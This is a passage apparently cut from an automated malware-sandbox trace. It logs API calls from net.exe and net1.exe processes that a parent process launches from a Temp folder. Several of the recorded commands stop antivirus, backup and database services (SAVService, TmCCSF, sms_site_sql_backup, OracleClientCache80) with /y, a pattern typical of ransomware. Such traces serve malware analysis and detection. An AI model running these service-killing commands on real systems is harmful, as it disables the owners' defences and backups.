"NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 736 os_tid = 0x1338 [0129.567] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x35fcc4 | out: lpSystemTimeAsFileTime=0x35fcc4*(dwLowDateTime=0x20f70110, dwHighDateTime=0x1d6f0d1)) [0129.567] GetCurrentProcessId () returned 0x1c4 [0129.567] GetCurrentThreadId () returned 0x1338 [0129.567] GetTickCount () returned 0x11539c6 [0129.567] QueryPerformanceCounter (in: lpPerformanceCount=0x35fcbc | out: lpPerformanceCount=0x35fcbc*=24866753045) returned 1 [0129.567] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0129.567] __set_app_type (_Type=0x1) [0129.567] __p__fmode () returned 0x770331f4 [0129.567] __p__commode () returned 0x770331fc [0129.567] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0129.567] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0129.567] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.567] GetConsoleOutputCP () returned 0x1b5 [0129.568] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0129.568] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.571] sprintf_s (in: _DstBuf=0x35fc7c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0129.572] setlocale (category=0, locale=".437") returned="English_United States.437" [0129.573] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3e0 [0129.574] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0129.574] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop sms_site_sql_backup /y" [0129.574] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x35fa48, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0129.574] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x7a) returned 0x413af0 [0129.574] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0129.574] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fc4c | out: Buffer=0x35fc4c*=0x411af8) returned 0x0 [0129.574] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fc4c | out: Buffer=0x35fc4c*=0x411b10) returned 0x0 [0129.574] _fileno (_File=0x77032900) returned -2 [0129.574] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0129.574] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0129.574] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0129.574] _wcsicmp (_String1="config", _String2="stop") returned -16 [0129.574] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0129.574] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0129.574] _wcsicmp (_String1="file", _String2="stop") returned -13 [0129.575] _wcsicmp (_String1="files", _String2="stop") returned -13 [0129.575] _wcsicmp (_String1="group", _String2="stop") returned -12 [0129.575] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0129.575] _wcsicmp (_String1="help", _String2="stop") returned -11 [0129.575] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0129.575] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0129.575] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0129.575] _wcsicmp (_String1="session", _String2="stop") returned -15 [0129.575] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0129.575] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0129.575] _wcsicmp (_String1="share", _String2="stop") returned -12 [0129.575] _wcsicmp (_String1="start", _String2="stop") returned -14 [0129.575] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0129.575] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0129.575] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0129.575] _wcsicmp (_String1="accounts", _String2="sms_site_sql_backup") returned -18 [0129.575] _wcsicmp (_String1="computer", _String2="sms_site_sql_backup") returned -16 [0129.575] _wcsicmp (_String1="config", _String2="sms_site_sql_backup") returned -16 [0129.575] _wcsicmp (_String1="continue", _String2="sms_site_sql_backup") returned -16 [0129.575] _wcsicmp (_String1="cont", _String2="sms_site_sql_backup") returned -16 [0129.575] _wcsicmp (_String1="file", _String2="sms_site_sql_backup") returned -13 [0129.575] _wcsicmp (_String1="files", _String2="sms_site_sql_backup") returned -13 [0129.575] _wcsicmp (_String1="group", _String2="sms_site_sql_backup") returned -12 [0129.575] _wcsicmp (_String1="groups", _String2="sms_site_sql_backup") returned -12 [0129.575] _wcsicmp (_String1="help", _String2="sms_site_sql_backup") returned -11 [0129.575] _wcsicmp (_String1="helpmsg", _String2="sms_site_sql_backup") returned -11 [0129.575] _wcsicmp (_String1="localgroup", _String2="sms_site_sql_backup") returned -7 [0129.575] _wcsicmp (_String1="pause", _String2="sms_site_sql_backup") returned -3 [0129.575] _wcsicmp (_String1="session", _String2="sms_site_sql_backup") returned -8 [0129.575] _wcsicmp (_String1="sessions", _String2="sms_site_sql_backup") returned -8 [0129.575] _wcsicmp (_String1="sess", _String2="sms_site_sql_backup") returned -8 [0129.575] _wcsicmp (_String1="share", _String2="sms_site_sql_backup") returned -5 [0129.576] _wcsicmp (_String1="start", _String2="sms_site_sql_backup") returned 7 [0129.576] _wcsicmp (_String1="stats", _String2="sms_site_sql_backup") returned 7 [0129.576] _wcsicmp (_String1="statistics", _String2="sms_site_sql_backup") returned 7 [0129.576] _wcsicmp (_String1="stop", _String2="sms_site_sql_backup") returned 7 [0129.576] _wcsicmp (_String1="time", _String2="sms_site_sql_backup") returned 1 [0129.576] _wcsicmp (_String1="user", _String2="sms_site_sql_backup") returned 2 [0129.576] _wcsicmp (_String1="users", _String2="sms_site_sql_backup") returned 2 [0129.576] _wcsicmp (_String1="msg", _String2="sms_site_sql_backup") returned -6 [0129.576] _wcsicmp (_String1="messenger", _String2="sms_site_sql_backup") returned -6 [0129.576] _wcsicmp (_String1="receiver", _String2="sms_site_sql_backup") returned -1 [0129.576] _wcsicmp (_String1="rcv", _String2="sms_site_sql_backup") returned -1 [0129.576] _wcsicmp (_String1="netpopup", _String2="sms_site_sql_backup") returned -5 [0129.576] _wcsicmp (_String1="redirector", _String2="sms_site_sql_backup") returned -1 [0129.576] _wcsicmp (_String1="redir", _String2="sms_site_sql_backup") returned -1 [0129.576] _wcsicmp (_String1="rdr", _String2="sms_site_sql_backup") returned -1 [0129.576] _wcsicmp (_String1="workstation", _String2="sms_site_sql_backup") returned 4 [0129.576] _wcsicmp (_String1="work", _String2="sms_site_sql_backup") returned 4 [0129.576] _wcsicmp (_String1="wksta", _String2="sms_site_sql_backup") returned 4 [0129.576] _wcsicmp (_String1="prdr", _String2="sms_site_sql_backup") returned -3 [0129.576] _wcsicmp (_String1="devrdr", _String2="sms_site_sql_backup") returned -15 [0129.576] _wcsicmp (_String1="lanmanworkstation", _String2="sms_site_sql_backup") returned -7 [0129.576] _wcsicmp (_String1="server", _String2="sms_site_sql_backup") returned -8 [0129.576] _wcsicmp (_String1="svr", _String2="sms_site_sql_backup") returned 9 [0129.576] _wcsicmp (_String1="srv", _String2="sms_site_sql_backup") returned 5 [0129.576] _wcsicmp (_String1="lanmanserver", _String2="sms_site_sql_backup") returned -7 [0129.576] _wcsicmp (_String1="alerter", _String2="sms_site_sql_backup") returned -18 [0129.576] _wcsicmp (_String1="netlogon", _String2="sms_site_sql_backup") returned -5 [0129.576] _wcsupr (in: _String="sms_site_sql_backup" | out: _String="SMS_SITE_SQL_BACKUP") returned="SMS_SITE_SQL_BACKUP" [0129.577] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4154d0 [0129.580] GetServiceKeyNameW (in: hSCManager=0x4154d0, lpDisplayName="SMS_SITE_SQL_BACKUP", lpServiceName=0xe5aaf0, lpcchBuffer=0x35fbe8 | out: lpServiceName="", lpcchBuffer=0x35fbe8) returned 0 [0129.581] _wcsicmp (_String1="msg", _String2="SMS_SITE_SQL_BACKUP") returned -6 [0129.581] _wcsicmp (_String1="messenger", _String2="SMS_SITE_SQL_BACKUP") returned -6 [0129.581] _wcsicmp (_String1="receiver", _String2="SMS_SITE_SQL_BACKUP") returned -1 [0129.581] _wcsicmp (_String1="rcv", _String2="SMS_SITE_SQL_BACKUP") returned -1 [0129.581] _wcsicmp (_String1="redirector", _String2="SMS_SITE_SQL_BACKUP") returned -1 [0129.581] _wcsicmp (_String1="redir", _String2="SMS_SITE_SQL_BACKUP") returned -1 [0129.581] _wcsicmp (_String1="rdr", _String2="SMS_SITE_SQL_BACKUP") returned -1 [0129.581] _wcsicmp (_String1="workstation", _String2="SMS_SITE_SQL_BACKUP") returned 4 [0129.581] _wcsicmp (_String1="work", _String2="SMS_SITE_SQL_BACKUP") returned 4 [0129.581] _wcsicmp (_String1="wksta", _String2="SMS_SITE_SQL_BACKUP") returned 4 [0129.581] _wcsicmp (_String1="prdr", _String2="SMS_SITE_SQL_BACKUP") returned -3 [0129.581] _wcsicmp (_String1="devrdr", _String2="SMS_SITE_SQL_BACKUP") returned -15 [0129.581] _wcsicmp (_String1="lanmanworkstation", _String2="SMS_SITE_SQL_BACKUP") returned -7 [0129.581] _wcsicmp (_String1="server", _String2="SMS_SITE_SQL_BACKUP") returned -8 [0129.581] _wcsicmp (_String1="svr", _String2="SMS_SITE_SQL_BACKUP") returned 9 [0129.581] _wcsicmp (_String1="srv", _String2="SMS_SITE_SQL_BACKUP") returned 5 [0129.581] _wcsicmp (_String1="lanmanserver", _String2="SMS_SITE_SQL_BACKUP") returned -7 [0129.581] _wcsicmp (_String1="alerter", _String2="SMS_SITE_SQL_BACKUP") returned -18 [0129.581] _wcsicmp (_String1="netlogon", _String2="SMS_SITE_SQL_BACKUP") returned -5 [0129.581] NetServiceControl (in: servername=0x0, service="SMS_SITE_SQL_BACKUP", opcode=0x0, arg=0x0, bufptr=0x35fbe4 | out: bufptr=0x35fbe4) returned 0x889 [0129.582] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0129.582] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0129.583] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0129.584] GetFileType (hFile=0x0) returned 0x0 [0129.584] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x413ef0 [0129.584] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x413ef0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n@", lpUsedDefaultChar=0x0) returned 30 [0129.584] WriteFile (in: hFile=0x0, lpBuffer=0x413ef0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x35fb24, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fb24, lpOverlapped=0x0) returned 0 [0129.584] LocalFree (hMem=0x413ef0) returned 0x0 [0129.584] GetFileType (hFile=0x0) returned 0x0 [0129.584] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x416198 [0129.585] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x416198, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nA", lpUsedDefaultChar=0x0) returned 2 [0129.585] WriteFile (in: hFile=0x0, lpBuffer=0x416198, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35fb24, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fb24, lpOverlapped=0x0) returned 0 [0129.585] LocalFree (hMem=0x416198) returned 0x0 [0129.585] _ultow (in: _Dest=0x889, _Radix=3537748 | out: _Dest=0x889) returned="2185" [0129.585] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0129.585] GetFileType (hFile=0x0) returned 0x0 [0129.585] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x416198 [0129.585] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x416198, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0129.585] WriteFile (in: hFile=0x0, lpBuffer=0x416198, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x35fb30, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fb30, lpOverlapped=0x0) returned 0 [0129.585] LocalFree (hMem=0x416198) returned 0x0 [0129.585] GetFileType (hFile=0x0) returned 0x0 [0129.585] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x416198 [0129.585] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x416198, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nA", lpUsedDefaultChar=0x0) returned 2 [0129.585] WriteFile (in: hFile=0x0, lpBuffer=0x416198, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35fb30, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35fb30, lpOverlapped=0x0) returned 0 [0129.585] LocalFree (hMem=0x416198) returned 0x0 [0129.586] NetApiBufferFree (Buffer=0x411af8) returned 0x0 [0129.586] NetApiBufferFree (Buffer=0x411b10) returned 0x0 [0129.586] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop sms_site_sql_backup /y" [0129.586] exit (_Code=2) Process: id = "326" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x525c6000" os_pid = "0xe18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop TrueKeyScheduler /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 743 os_tid = 0x944 Process: id = "327" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x51bcb000" os_pid = "0x11e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop SAVService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 744 os_tid = 0xa6c Process: id = "328" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5b8d0000" os_pid = "0x1224" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop TmCCSF /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 745 os_tid = 0x1214 Process: id = "329" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x69cb9000" os_pid = "0x11fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "194" os_parent_pid = "0x12f8" cmd_line = "C:\\Windows\\system32\\net1 stop OracleClientCache80 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 746 os_tid = 0xbb4 [0131.325] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31f894 | out: lpSystemTimeAsFileTime=0x31f894*(dwLowDateTime=0x2203fc70, dwHighDateTime=0x1d6f0d1)) [0131.325] GetCurrentProcessId () returned 0x11fc [0131.325] GetCurrentThreadId () returned 0xbb4 [0131.325] GetTickCount () returned 0x11540a9 [0131.325] QueryPerformanceCounter (in: lpPerformanceCount=0x31f88c | out: lpPerformanceCount=0x31f88c*=25042622880) returned 1 [0131.326] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0131.326] __set_app_type (_Type=0x1) [0131.326] __p__fmode () returned 0x770331f4 [0131.326] __p__commode () returned 0x770331fc [0131.326] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0131.326] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0131.326] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.326] GetConsoleOutputCP () returned 0x1b5 [0131.327] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0131.327] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.720] sprintf_s (in: _DstBuf=0x31f84c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0131.720] setlocale (category=0, locale=".437") returned="English_United States.437" [0131.723] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3e0 [0131.723] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0131.723] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop OracleClientCache80 /y" [0131.723] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x31f618, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0131.723] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x7a) returned 0x553af0 [0131.723] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0131.723] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x31f81c | out: Buffer=0x31f81c*=0x551af8) returned 0x0 [0131.723] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x31f81c | out: Buffer=0x31f81c*=0x551b10) returned 0x0 [0131.723] _fileno (_File=0x77032900) returned -2 [0131.723] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0131.723] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0131.723] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0131.723] _wcsicmp (_String1="config", _String2="stop") returned -16 [0131.723] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0131.723] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0131.723] _wcsicmp (_String1="file", _String2="stop") returned -13 [0131.724] _wcsicmp (_String1="files", _String2="stop") returned -13 [0131.724] _wcsicmp (_String1="group", _String2="stop") returned -12 [0131.724] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0131.724] _wcsicmp (_String1="help", _String2="stop") returned -11 [0131.724] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0131.724] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0131.724] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0131.724] _wcsicmp (_String1="session", _String2="stop") returned -15 [0131.724] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0131.724] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0131.724] _wcsicmp (_String1="share", _String2="stop") returned -12 [0131.724] _wcsicmp (_String1="start", _String2="stop") returned -14 [0131.724] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0131.724] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0131.724] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0131.724] _wcsicmp (_String1="accounts", _String2="OracleClientCache80") returned -14 [0131.724] _wcsicmp (_String1="computer", _String2="OracleClientCache80") returned -12 [0131.724] _wcsicmp (_String1="config", _String2="OracleClientCache80") returned -12 [0131.724] _wcsicmp (_String1="continue", _String2="OracleClientCache80") returned -12 [0131.724] _wcsicmp (_String1="cont", _String2="OracleClientCache80") returned -12 [0131.724] _wcsicmp (_String1="file", _String2="OracleClientCache80") returned -9 [0131.724] _wcsicmp (_String1="files", _String2="OracleClientCache80") returned -9 [0131.724] _wcsicmp (_String1="group", _String2="OracleClientCache80") returned -8 [0131.724] _wcsicmp (_String1="groups", _String2="OracleClientCache80") returned -8 [0131.724] _wcsicmp (_String1="help", _String2="OracleClientCache80") returned -7 [0131.724] _wcsicmp (_String1="helpmsg", _String2="OracleClientCache80") returned -7 [0131.724] _wcsicmp (_String1="localgroup", _String2="OracleClientCache80") returned -3 [0131.724] _wcsicmp (_String1="pause", _String2="OracleClientCache80") returned 1 [0131.724] _wcsicmp (_String1="session", _String2="OracleClientCache80") returned 4 [0131.724] _wcsicmp (_String1="sessions", _String2="OracleClientCache80") returned 4 [0131.724] _wcsicmp (_String1="sess", _String2="OracleClientCache80") returned 4 [0131.724] _wcsicmp (_String1="share", _String2="OracleClientCache80") returned 4 [0131.725] _wcsicmp (_String1="start", _String2="OracleClientCache80") returned 4 [0131.725] _wcsicmp (_String1="stats", _String2="OracleClientCache80") returned 4 [0131.725] _wcsicmp (_String1="statistics", _String2="OracleClientCache80") returned 4 [0131.725] _wcsicmp (_String1="stop", _String2="OracleClientCache80") returned 4 [0131.725] _wcsicmp (_String1="time", _String2="OracleClientCache80") returned 5 [0131.725] _wcsicmp (_String1="user", _String2="OracleClientCache80") returned 6 [0131.725] _wcsicmp (_String1="users", _String2="OracleClientCache80") returned 6 [0131.725] _wcsicmp (_String1="msg", _String2="OracleClientCache80") returned -2 [0131.725] _wcsicmp (_String1="messenger", _String2="OracleClientCache80") returned -2 [0131.725] _wcsicmp (_String1="receiver", _String2="OracleClientCache80") returned 3 [0131.725] _wcsicmp (_String1="rcv", _String2="OracleClientCache80") returned 3 [0131.725] _wcsicmp (_String1="netpopup", _String2="OracleClientCache80") returned -1 [0131.725] _wcsicmp (_String1="redirector", _String2="OracleClientCache80") returned 3 [0131.725] _wcsicmp (_String1="redir", _String2="OracleClientCache80") returned 3 [0131.725] _wcsicmp (_String1="rdr", _String2="OracleClientCache80") returned 3 [0131.725] _wcsicmp (_String1="workstation", _String2="OracleClientCache80") returned 8 [0131.725] _wcsicmp (_String1="work", _String2="OracleClientCache80") returned 8 [0131.725] _wcsicmp (_String1="wksta", _String2="OracleClientCache80") returned 8 [0131.725] _wcsicmp (_String1="prdr", _String2="OracleClientCache80") returned 1 [0131.725] _wcsicmp (_String1="devrdr", _String2="OracleClientCache80") returned -11 [0131.725] _wcsicmp (_String1="lanmanworkstation", _String2="OracleClientCache80") returned -3 [0131.725] _wcsicmp (_String1="server", _String2="OracleClientCache80") returned 4 [0131.725] _wcsicmp (_String1="svr", _String2="OracleClientCache80") returned 4 [0131.725] _wcsicmp (_String1="srv", _String2="OracleClientCache80") returned 4 [0131.725] _wcsicmp (_String1="lanmanserver", _String2="OracleClientCache80") returned -3 [0131.725] _wcsicmp (_String1="alerter", _String2="OracleClientCache80") returned -14 [0131.725] _wcsicmp (_String1="netlogon", _String2="OracleClientCache80") returned -1 [0131.726] _wcsupr (in: _String="OracleClientCache80" | out: _String="ORACLECLIENTCACHE80") returned="ORACLECLIENTCACHE80" [0131.726] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5554d0 [0131.729] GetServiceKeyNameW (in: hSCManager=0x5554d0, lpDisplayName="ORACLECLIENTCACHE80", lpServiceName=0xe5aaf0, lpcchBuffer=0x31f7b8 | out: lpServiceName="", lpcchBuffer=0x31f7b8) returned 0 [0131.730] _wcsicmp (_String1="msg", _String2="ORACLECLIENTCACHE80") returned -2 [0131.730] _wcsicmp (_String1="messenger", _String2="ORACLECLIENTCACHE80") returned -2 [0131.730] _wcsicmp (_String1="receiver", _String2="ORACLECLIENTCACHE80") returned 3 [0131.730] _wcsicmp (_String1="rcv", _String2="ORACLECLIENTCACHE80") returned 3 [0131.730] _wcsicmp (_String1="redirector", _String2="ORACLECLIENTCACHE80") returned 3 [0131.730] _wcsicmp (_String1="redir", _String2="ORACLECLIENTCACHE80") returned 3 [0131.730] _wcsicmp (_String1="rdr", _String2="ORACLECLIENTCACHE80") returned 3 [0131.730] _wcsicmp (_String1="workstation", _String2="ORACLECLIENTCACHE80") returned 8 [0131.730] _wcsicmp (_String1="work", _String2="ORACLECLIENTCACHE80") returned 8 [0131.730] _wcsicmp (_String1="wksta", _String2="ORACLECLIENTCACHE80") returned 8 [0131.730] _wcsicmp (_String1="prdr", _String2="ORACLECLIENTCACHE80") returned 1 [0131.730] _wcsicmp (_String1="devrdr", _String2="ORACLECLIENTCACHE80") returned -11 [0131.730] _wcsicmp (_String1="lanmanworkstation", _String2="ORACLECLIENTCACHE80") returned -3 [0131.731] _wcsicmp (_String1="server", _String2="ORACLECLIENTCACHE80") returned 4 [0131.731] _wcsicmp (_String1="svr", _String2="ORACLECLIENTCACHE80") returned 4 [0131.731] _wcsicmp (_String1="srv", _String2="ORACLECLIENTCACHE80") returned 4 [0131.731] _wcsicmp (_String1="lanmanserver", _String2="ORACLECLIENTCACHE80") returned -3 [0131.731] _wcsicmp (_String1="alerter", _String2="ORACLECLIENTCACHE80") returned -14 [0131.731] _wcsicmp (_String1="netlogon", _String2="ORACLECLIENTCACHE80") returned -1 [0131.731] NetServiceControl (in: servername=0x0, service="ORACLECLIENTCACHE80", opcode=0x0, arg=0x0, bufptr=0x31f7b4 | out: bufptr=0x31f7b4) returned 0x889 [0131.732] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0131.732] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71240000 [0131.735] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71240000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0131.736] GetFileType (hFile=0x0) returned 0x0 [0131.736] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x553ef0 [0131.736] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x553ef0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\nT", lpUsedDefaultChar=0x0) returned 30 [0131.736] WriteFile (in: hFile=0x0, lpBuffer=0x553ef0, nNumberOfBytesToWrite=0x1e, 